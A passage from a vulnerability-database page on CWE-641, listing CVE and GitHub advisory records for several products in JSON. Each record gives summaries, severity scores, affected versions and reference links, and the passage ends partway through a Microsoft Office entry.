Common Weakness Enumeration

CWE-641

Allowed

Improper Restriction of Names for Files and Other Resources

Abstraction: Base · Status: Incomplete

The product constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name.

30 vulnerabilities reference this CWE, most recent first.

CVE-2023-0046 (GCVE-0-2023-0046)

Vulnerability from cvelistv5 – Published: 2023-01-04 00:00 – Updated: 2025-04-09 15:31
VLAI
Title
Improper Restriction of Names for Files and Other Resources in lirantal/daloradius
Summary
Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch.
SSVC
Exploitation: poc Automatable: no Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
  • CWE-641 - Improper Restriction of Names for Files and Other Resources
Assigner
Impacted products
Vendor Product Version
lirantal lirantal/daloradius Affected: unspecified , < master-branch (custom)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.612Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://huntr.dev/bounties/2214dc41-f283-4342-95b1-34a2f4fea943"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://github.com/lirantal/daloradius/commit/2013c2d1231e99dac918247b69b198ded1f30a1c"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-0046",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-09T14:27:01.072972Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-09T15:31:33.690Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "lirantal/daloradius",
          "vendor": "lirantal",
          "versions": [
            {
              "lessThan": "master-branch",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-641",
              "description": "CWE-641 Improper Restriction of Names for Files and Other Resources",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-01-04T00:00:00.000Z",
        "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
        "shortName": "@huntrdev"
      },
      "references": [
        {
          "url": "https://huntr.dev/bounties/2214dc41-f283-4342-95b1-34a2f4fea943"
        },
        {
          "url": "https://github.com/lirantal/daloradius/commit/2013c2d1231e99dac918247b69b198ded1f30a1c"
        }
      ],
      "source": {
        "advisory": "2214dc41-f283-4342-95b1-34a2f4fea943",
        "discovery": "EXTERNAL"
      },
      "title": "Improper Restriction of Names for Files and Other Resources in lirantal/daloradius"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
    "assignerShortName": "@huntrdev",
    "cveId": "CVE-2023-0046",
    "datePublished": "2023-01-04T00:00:00.000Z",
    "dateReserved": "2023-01-04T00:00:00.000Z",
    "dateUpdated": "2025-04-09T15:31:33.690Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-36302 (GCVE-0-2022-36302)

Vulnerability from cvelistv5 – Published: 2022-08-01 14:03 – Updated: 2024-08-03 10:00
VLAI
Summary
File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information.
CWE
  • CWE-641 - Improper Restriction of Names for Files and Other Resources
Assigner
References
Impacted products
Vendor Product Version
Bosch BF-OS Affected: 3.0 , ≤ 3.83 (custom)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:00:04.271Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://psirt.bosch.com/security-advisories/bosch-sa-013924-bt.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "platforms": [
            "Bigfish V3 (Linux)"
          ],
          "product": "BF-OS",
          "vendor": "Bosch",
          "versions": [
            {
              "lessThanOrEqual": "3.83",
              "status": "affected",
              "version": "3.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "platforms": [
            "PR21 (Linux)"
          ],
          "product": "BF-OS",
          "vendor": "Bosch",
          "versions": [
            {
              "lessThanOrEqual": "3.83",
              "status": "affected",
              "version": "3.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "platforms": [
            "VM (Windows)"
          ],
          "product": "BF-OS",
          "vendor": "Bosch",
          "versions": [
            {
              "lessThanOrEqual": "3.83",
              "status": "affected",
              "version": "3.0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-641",
              "description": "CWE-641 Improper Restriction of Names for Files and Other Resources",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-08-01T14:03:01.000Z",
        "orgId": "c95f66b2-7e7c-41c5-8f09-6f86ec68659c",
        "shortName": "bosch"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://psirt.bosch.com/security-advisories/bosch-sa-013924-bt.html"
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@bosch.com",
          "ID": "CVE-2022-36302",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "BF-OS",
                      "version": {
                        "version_data": [
                          {
                            "platform": "Bigfish V3 (Linux)",
                            "version_affected": "\u003c=",
                            "version_name": "3.0",
                            "version_value": "3.83"
                          },
                          {
                            "platform": "PR21 (Linux)",
                            "version_affected": "\u003c=",
                            "version_name": "3.0",
                            "version_value": "3.83"
                          },
                          {
                            "platform": "VM (Windows)",
                            "version_affected": "\u003c=",
                            "version_name": "3.0",
                            "version_value": "3.83"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Bosch"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-641 Improper Restriction of Names for Files and Other Resources"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://psirt.bosch.com/security-advisories/bosch-sa-013924-bt.html",
              "refsource": "CONFIRM",
              "url": "https://psirt.bosch.com/security-advisories/bosch-sa-013924-bt.html"
            }
          ]
        },
        "source": {
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "c95f66b2-7e7c-41c5-8f09-6f86ec68659c",
    "assignerShortName": "bosch",
    "cveId": "CVE-2022-36302",
    "datePublished": "2022-08-01T14:03:43.000Z",
    "dateReserved": "2022-07-19T00:00:00.000Z",
    "dateUpdated": "2024-08-03T10:00:04.271Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-23536 (GCVE-0-2022-23536)

Vulnerability from cvelistv5 – Published: 2022-12-19 21:10 – Updated: 2025-04-16 18:23
VLAI
Title
Alertmanager can expose local files content via specially crafted config
Summary
Cortex provides multi-tenant, long term storage for Prometheus. A local file inclusion vulnerability exists in Cortex versions 1.13.0, 1.13.1 and 1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the Alertmanager Set Configuration API. Only users of the Alertmanager service where `-experimental.alertmanager.enable-api` or `enable_api: true` is configured are affected. Affected Cortex users are advised to upgrade to patched versions 1.13.2 or 1.14.1. However as a workaround, Cortex administrators may reject Alertmanager configurations containing the `api_key_file` setting in the `opsgenie_configs` section before sending to the Set Alertmanager Configuration API.
SSVC
Exploitation: none Automatable: no Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
  • CWE-73 - External Control of File Name or Path
  • CWE-184 - Incomplete List of Disallowed Inputs
  • CWE-641 - Improper Restriction of Names for Files and Other Resources
Assigner
Impacted products
Vendor Product Version
cortexproject cortex Affected: >= 1.13.0, <= 1.13.1
Affected: = 1.14.0
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T03:43:46.472Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/cortexproject/cortex/security/advisories/GHSA-cq2g-pw6q-hf7j",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/cortexproject/cortex/security/advisories/GHSA-cq2g-pw6q-hf7j"
          },
          {
            "name": "https://cortexmetrics.io/docs/api/#set-alertmanager-configuration",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://cortexmetrics.io/docs/api/#set-alertmanager-configuration"
          },
          {
            "name": "https://github.com/cortexproject/cortex/releases/tag/v1.13.2",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/cortexproject/cortex/releases/tag/v1.13.2"
          },
          {
            "name": "https://github.com/cortexproject/cortex/releases/tag/v1.14.1",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/cortexproject/cortex/releases/tag/v1.14.1"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-23536",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-16T18:22:58.411747Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-16T18:23:07.694Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "cortex",
          "vendor": "cortexproject",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.13.0, \u003c= 1.13.1"
            },
            {
              "status": "affected",
              "version": "= 1.14.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Cortex provides multi-tenant, long term storage for Prometheus. A local file inclusion vulnerability exists in Cortex versions 1.13.0, 1.13.1 and 1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the Alertmanager Set Configuration API. Only users of the Alertmanager service where `-experimental.alertmanager.enable-api` or `enable_api: true` is configured are affected. Affected Cortex users are advised to upgrade to patched versions 1.13.2 or 1.14.1. However as a workaround, Cortex administrators may reject Alertmanager configurations containing the `api_key_file` setting in the `opsgenie_configs` section before sending to the Set Alertmanager Configuration API.\n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-73",
              "description": "CWE-73: External Control of File Name or Path",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-184",
              "description": "CWE-184: Incomplete List of Disallowed Inputs",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-641",
              "description": "CWE-641: Improper Restriction of Names for Files and Other Resources",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-19T21:10:21.977Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/cortexproject/cortex/security/advisories/GHSA-cq2g-pw6q-hf7j",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/cortexproject/cortex/security/advisories/GHSA-cq2g-pw6q-hf7j"
        },
        {
          "name": "https://cortexmetrics.io/docs/api/#set-alertmanager-configuration",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://cortexmetrics.io/docs/api/#set-alertmanager-configuration"
        },
        {
          "name": "https://github.com/cortexproject/cortex/releases/tag/v1.13.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/cortexproject/cortex/releases/tag/v1.13.2"
        },
        {
          "name": "https://github.com/cortexproject/cortex/releases/tag/v1.14.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/cortexproject/cortex/releases/tag/v1.14.1"
        }
      ],
      "source": {
        "advisory": "GHSA-cq2g-pw6q-hf7j",
        "discovery": "UNKNOWN"
      },
      "title": "Alertmanager can expose local files content via specially crafted config"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2022-23536",
    "datePublished": "2022-12-19T21:10:21.977Z",
    "dateReserved": "2022-01-19T21:23:53.793Z",
    "dateUpdated": "2025-04-16T18:23:07.694Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-41146 (GCVE-0-2021-41146)

Vulnerability from cvelistv5 – Published: 2021-10-21 17:35 – Updated: 2024-08-04 02:59
VLAI
Title
Arbitrary command execution on Windows in qutebrowser
Summary
qutebrowser is an open source keyboard-focused browser with a minimal GUI. Starting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers a `qutebrowserurl:` URL handler. With certain applications, opening a specially crafted `qutebrowserurl:...` URL can lead to execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`. Only Windows installs where qutebrowser is registered as URL handler are affected. The issue has been fixed in qutebrowser v2.4.0. The fix also adds additional hardening for potential similar issues on Linux (by adding the new --untrusted-args flag to the .desktop file), though no such vulnerabilities are known.
CWE
  • CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
  • CWE-88 - Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
  • CWE-641 - Improper Restriction of Names for Files and Other Resources
Assigner
References
Impacted products
Vendor Product Version
qutebrowser qutebrowser Affected: >= 1.7.0, < 2.4.0
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T02:59:31.423Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-vw27-fwjf-5qxm"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "qutebrowser",
          "vendor": "qutebrowser",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.7.0, \u003c 2.4.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "qutebrowser is an open source keyboard-focused browser with a minimal GUI. Starting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers a `qutebrowserurl:` URL handler. With certain applications, opening a specially crafted `qutebrowserurl:...` URL can lead to execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`. Only Windows installs where qutebrowser is registered as URL handler are affected. The issue has been fixed in qutebrowser v2.4.0. The fix also adds additional hardening for potential similar issues on Linux (by adding the new --untrusted-args flag to the .desktop file), though no such vulnerabilities are known."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-77",
              "description": "CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-88",
              "description": "CWE-88: Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-641",
              "description": "CWE-641: Improper Restriction of Names for Files and Other Resources",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-10-21T17:35:10.000Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-vw27-fwjf-5qxm"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430"
        }
      ],
      "source": {
        "advisory": "GHSA-vw27-fwjf-5qxm",
        "discovery": "UNKNOWN"
      },
      "title": "Arbitrary command execution on Windows in qutebrowser",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2021-41146",
          "STATE": "PUBLIC",
          "TITLE": "Arbitrary command execution on Windows in qutebrowser"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "qutebrowser",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "\u003e= 1.7.0, \u003c 2.4.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "qutebrowser"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "qutebrowser is an open source keyboard-focused browser with a minimal GUI. Starting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers a `qutebrowserurl:` URL handler. With certain applications, opening a specially crafted `qutebrowserurl:...` URL can lead to execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`. Only Windows installs where qutebrowser is registered as URL handler are affected. The issue has been fixed in qutebrowser v2.4.0. The fix also adds additional hardening for potential similar issues on Linux (by adding the new --untrusted-args flag to the .desktop file), though no such vulnerabilities are known."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
                }
              ]
            },
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-88: Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
                }
              ]
            },
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-641: Improper Restriction of Names for Files and Other Resources"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-vw27-fwjf-5qxm",
              "refsource": "CONFIRM",
              "url": "https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-vw27-fwjf-5qxm"
            },
            {
              "name": "https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430",
              "refsource": "MISC",
              "url": "https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430"
            }
          ]
        },
        "source": {
          "advisory": "GHSA-vw27-fwjf-5qxm",
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2021-41146",
    "datePublished": "2021-10-21T17:35:10.000Z",
    "dateReserved": "2021-09-15T00:00:00.000Z",
    "dateUpdated": "2024-08-04T02:59:31.423Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2019-25623 (GCVE-0-2019-25623)

Vulnerability from cvelistv5 – Published: 2026-03-23 13:48 – Updated: 2026-03-23 19:00
VLAI
Title
Luminance Studio 2.17 Denial of Service via Malformed Input
Summary
Luminance Studio 2.17 contains a denial of service vulnerability that allows local attackers to crash the application by providing malformed input through the keyboard interface. Attackers can create a text file with arbitrary character sequences and trigger the application to process the input, causing the application to become unresponsive or terminate abnormally.
SSVC
Exploitation: poc Automatable: no Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
  • CWE-641 - Improper Restriction of Names for Files and Other Resources
Assigner
Impacted products
Date Public
2019-01-11 00:00
Credits
Ihsan Sencan
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2019-25623",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-23T18:59:33.223280Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-23T19:00:21.879Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Luminance Studio",
          "vendor": "Pixarra",
          "versions": [
            {
              "status": "affected",
              "version": "2.17"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Ihsan Sencan"
        }
      ],
      "datePublic": "2019-01-11T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Luminance Studio 2.17 contains a denial of service vulnerability that allows local attackers to crash the application by providing malformed input through the keyboard interface. Attackers can create a text file with arbitrary character sequences and trigger the application to process the input, causing the application to become unresponsive or terminate abnormally."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS"
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-641",
              "description": "Improper Restriction of Names for Files and Other Resources",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T13:48:38.908Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "ExploitDB-46130",
          "tags": [
            "exploit"
          ],
          "url": "https://www.exploit-db.com/exploits/46130"
        },
        {
          "name": "Official Product Homepage",
          "tags": [
            "product"
          ],
          "url": "http://www.pixarra.com/"
        },
        {
          "name": "Product Reference",
          "tags": [
            "product"
          ],
          "url": "http://www.pixarra.com/uploads/9/4/6/3/94635436/tbluminancestudio_install.exe"
        },
        {
          "name": "VulnCheck Advisory: Luminance Studio 2.17 Denial of Service via Malformed Input",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/luminance-studio-denial-of-service-via-malformed-input"
        }
      ],
      "title": "Luminance Studio 2.17 Denial of Service via Malformed Input",
      "x_generator": {
        "engine": "vulncheck"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2019-25623",
    "datePublished": "2026-03-23T13:48:38.908Z",
    "dateReserved": "2026-03-23T13:46:19.225Z",
    "dateUpdated": "2026-03-23T19:00:21.879Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

GHSA-5MQ4-G7C8-JH32

Vulnerability from github – Published: 2025-06-10 18:32 – Updated: 2025-06-10 18:32
VLAI
Details

Improper input validation in Microsoft Office allows an unauthorized attacker to execute code locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-47173"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-641"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-10T17:23:53Z",
    "severity": "HIGH"
  },
  "details": "Improper input validation in Microsoft Office allows an unauthorized attacker to execute code locally.",
  "id": "GHSA-5mq4-g7c8-jh32",
  "modified": "2025-06-10T18:32:31Z",
  "published": "2025-06-10T18:32:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47173"
    },
    {
      "type": "WEB",
